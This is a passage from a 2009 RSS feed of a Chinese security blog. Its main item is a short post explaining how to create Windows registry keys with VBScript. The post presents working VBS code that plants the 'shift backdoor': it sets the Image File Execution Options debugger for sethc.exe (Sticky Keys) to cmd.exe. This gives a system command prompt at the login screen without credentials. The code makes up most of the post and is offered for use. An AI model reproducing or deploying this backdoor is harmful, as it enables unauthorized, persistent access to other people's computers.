<p><a href="http://feedads.g.doubleclick.net/~a/NsnoFvArA3QwwgzDZ5WZoFcPuzw/0/da"><img src="http://feedads.g.doubleclick.net/~a/NsnoFvArA3QwwgzDZ5WZoFcPuzw/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/NsnoFvArA3QwwgzDZ5WZoFcPuzw/1/da"><img src="http://feedads.g.doubleclick.net/~a/NsnoFvArA3QwwgzDZ5WZoFcPuzw/1/di" border="0" ismap="true"></img></a></p>]]></content:encoded>
			<wfw:commentRss>http://huaidan.org/archives/3202.html/feed</wfw:commentRss>
		<slash:comments>15</slash:comments>
		</item>
		<item>
		<title>vbs创建注册表项</title>
		<link>http://huaidan.org/archives/3200.html</link>
		<comments>http://huaidan.org/archives/3200.html#comments</comments>
		<pubDate>Thu, 02 Jul 2009 10:06:44 +0000</pubDate>
		<dc:creator>鬼仔</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[Shift]]></category>
		<category><![CDATA[VBS]]></category>
		<category><![CDATA[注册表]]></category>

		<guid isPermaLink="false">http://huaidan.org/archives/3200.html</guid>
		<description><![CDATA[作者：lcx
利用vbs创建注册表值较简单，创建注册表项的话，网上多是用wmi来，例如代码：
const HKEY_LOCAL_MACHINE = &#38;H80000002
strComputer = "."
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &#38;_
st... ]]></description>
			<content:encoded><![CDATA[<p>作者：<a href="http://hi.baidu.com/myvbscript/blog/item/43ec2af31495dd59342acc6c.html" target="_blank">lcx</a></p>
<p>利用vbs创建注册表值较简单，创建注册表项的话，网上多是用wmi来，例如代码：</p>
<pre><code>const HKEY_LOCAL_MACHINE = &amp;H80000002
strComputer = "."
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &amp;_
strComputer &amp; "\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"  ‘创建sethc.exe项
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath</code></pre>
<p><span id="more-3200"></span></p>
<p>难道WshShell 对象的RegWrite 方法真的不可以吗？我仔细研究了一下，只需要在要加入的项后加\就可以，例如</p>
<pre><code>Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\","","REG_SZ"</code></pre>
<p>所以我们创建shift后门的话，两句话就可以。</p>
<pre><code>Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\debugger",WScript.CreateObject("WScript.shell").ExpandEnvironmentStrings("%SystemRoot%")&amp;"\system32\cmd.exe","REG_SZ"</code></pre>
<hr />
<a href="http://huaidan.org/archives/3200.html#respond" target="_blank"><strong>发表评论</strong></a> | 分类：<a href="http://huaidan.org/archives/category/technology" title="显示技术文章的所有日志" rel="category tag">技术文章</a><br /><br />

© 鬼仔 for <a href="http://huaidan.org" target="_blank">鬼仔's Blog</a>, 2009. | 本文网址：<a href="http://huaidan.org/archives/3200.html" target="_blank">http://huaidan.org/archives/3200.html</a><img src="http://img.tongji.linezing.com/708134/tongji.gif" alt="" />
	<h4>相关日志</h4>
	<ul class="st-related-posts">
	<li><a href="http://huaidan.org/archives/1579.html" title="非常规运行vbs (2007/12/23)">非常规运行vbs</a> (0)</li>
	<li><a href="http://huaidan.org/archives/1549.html" title="隐藏注册表键代码 (2007/12/16)">隐藏注册表键代码</a> (0)</li>
	<li><a href="http://huaidan.org/archives/1930.html" title="输入小助手.vbs (2008/04/26)">输入小助手.vbs</a> (2)</li>
	<li><a href="http://huaidan.org/archives/1749.html" title="跟踪劫持execute解密VBS乱码 (2008/03/05)">跟踪劫持execute解密VBS乱码</a> (0)</li>
	<li><a href="http://huaidan.org/archives/1474.html" title="谈VBS在Hacking中的作用之二 (2007/11/17)">谈VBS在Hacking中的作用之二</a> (0)</li>
</ul>


<p><a href="http://feedads.g.doubleclick.net/~a/bHYSEGRpHLMEyOWPVXjiIFfzlzY/0/da"><img src="http://feedads.g.doubleclick.net/~a/bHYSEGRpHLMEyOWPVXjiIFfzlzY/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/bHYSEGRpHLMEyOWPVXjiIFfzlzY/1/da"><img src="http://feedads.g.doubleclick.net/~a/bHYSEGRpHLMEyOWPVXjiIFfzlzY/1/di" border="0" ismap="true"></img></a></p>]]></content:encoded>
			<wfw:commentRss>http://huaidan.org/archives/3200.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss><!-- Dynamic page generated in 0.687 seconds. --><!-- Cached page generated by WP-Super-Cache on 2009-07-11 11:19:51 --><!-- Compression = gzip -->
